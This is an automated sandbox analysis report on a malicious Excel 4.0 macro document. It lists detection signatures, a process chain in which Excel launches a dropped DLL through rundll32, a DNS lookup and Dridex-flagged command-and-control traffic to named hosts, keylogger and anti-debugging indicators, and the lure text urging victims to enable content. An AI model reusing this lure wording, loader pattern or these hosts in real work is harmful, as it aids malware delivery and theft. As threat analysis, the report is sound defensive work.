Analysis Report Documents_460000622_1464906353.xls

Overview

General Information

Sample Name: Documents_460000622_1464906353.xls
Analysis ID: 383422
MD5: bcd540201ec5e0301816d194bb15ec30
SHA1: e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
SHA256: a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected Xls With Macro 4.0
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2004 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2536 cmdline: rundll32 ..\ndgfht.frg,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 1108 cmdline: rundll32 ..\ndgfht.frg,PluginInit MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • cmd.exe (PID: 3032 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Documents_460000622_1464906353.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x165b8:$e1: Enable Editing
  • 0x16302:$e3: Enable editing
  • 0x163d4:$e4: Enable content

Source: Documents_460000622_1464906353.xls
Rule: JoeSecurity_XlsWithMacro4
Description: Yara detected Xls With Macro 4.0
Author: Joe Security

Memory Dumps

Source: Process Memory Space: rundll32.exe PID: 1108
Rule: JoeSecurity_Keylogger_Generic
Description: Yara detected Keylogger Generic
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E77F61E FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E802EC8 FindFirstFileExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E803336 FindFirstFileExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E803361 FindFirstFileExW,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: ohior[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: whiskyexpanse.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 52.12.4.186:443 -> 192.168.2.22:49170
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: unknown | TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\585D4361.emf
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: whiskyexpanse.com
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
      Source: rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: rundll32.exe, 00000004.00000003.2166659967.00000000002DA000.00000004.00000001.sdmpString found in binary or memory: https://52.12.4.186/5B
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/h
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/update
      Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/update6
      Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/updateA
      Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmpString found in binary or memory: https://52.12.4.186/news/updateF
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
      Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
      Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownHTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
      Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmpBinary or memory string: DirectDrawCreateEx
      Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmpBinary or memory string: GetRawInputData
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1108, type: MEMORY

      System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4 | Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start . the decryption of the docum
Source: Screenshot number: 8 | Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Source: Document image extraction number: 2 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3 | Screenshot OCR: Enable Content
Source: Document image extraction number: 4 | Screenshot OCR: Enable Editing
Source: Document image extraction number: 13 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Screenshot number: 12 | Screenshot OCR: Enable editing Windowscan check onlinefora solution tothe problem. ernet. 13 14 Protected View Thi
Found Excel 4.0 Macro with suspicious formulas
Source: Documents_460000622_1464906353.xls | Initial sample: EXEC
Source: Documents_460000622_1464906353.xls | Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\ndgfht.frg
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E777A4B NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E783C31
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7A9E50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E5FFD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7F3FDF
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7F0C10
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E5DC3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7A8A70
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E5B94
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E595A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7D665D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7F0760
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E79A730
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E572B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E6723
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E64C6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7ED5DE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E625A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E79C2D0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7FB360
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7D83F0
Source: Documents_460000622_1464906353.xls | OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E7794D0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E7D4553 appears 73 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E7D4E40 appears 54 times
Source: Documents_460000622_1464906353.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.expl.evad.winXLS@7/12@1/2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E777B4D CoCreateInstance,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{ce7c126a-cd42-45d2-8a55-1f743478800b}
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{395c2195-6d12-42eb-b952-6aae2e230819}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD7B8.tmp
Source: Documents_460000622_1464906353.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E784371 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E792E8F push ss; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7D4E86 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7926ED push esp; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7D451C push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E79521B push esp; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E791047 push esp; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E794020 push cs; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\ndgfht.frg
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\ndgfht.frg
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\ndgfht.frg

      Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\ndgfht.frg
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (26 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (6 identical entries)

      Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp | Binary or memory string: CDB.EXEWINDBG.EXE
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E77F61E FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E802EC8 FindFirstFileExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E803336 FindFirstFileExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E803361 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E77F248 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E77C61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7F4D21 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E77865C GetProcessHeap,InternetQueryDataAvailable,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E77D332 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E778FBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7791BB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7D4A3C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7D4728 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7E9302 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.12.4.186 187
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ndgfht.frg,PluginInit
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: Yara match | File source: Documents_460000622_1464906353.xls, type: SAMPLE
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp | Binary or memory string: FoldersAppPropertiesPROGMAN
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp | Binary or memory string: Program Manager
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp | Binary or memory string: GetProgmanWindow
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp | Binary or memory string: Progman
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp | Binary or memory string: ProgmanProgman3
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp | Binary or memory string: IMECreateGroupShowGroupAddItemExitProgmanDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileDDEClientddeClassccInsDDEBWWFrameDDEClientWndClassBACKSCAPE#32770SenderCA_DDECLASSInstallMake Program Manager GroupViewFolderExploreFolder
Source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp | Binary or memory string: SetProgmanWindow
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E7792E1 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoEx,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E779516 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
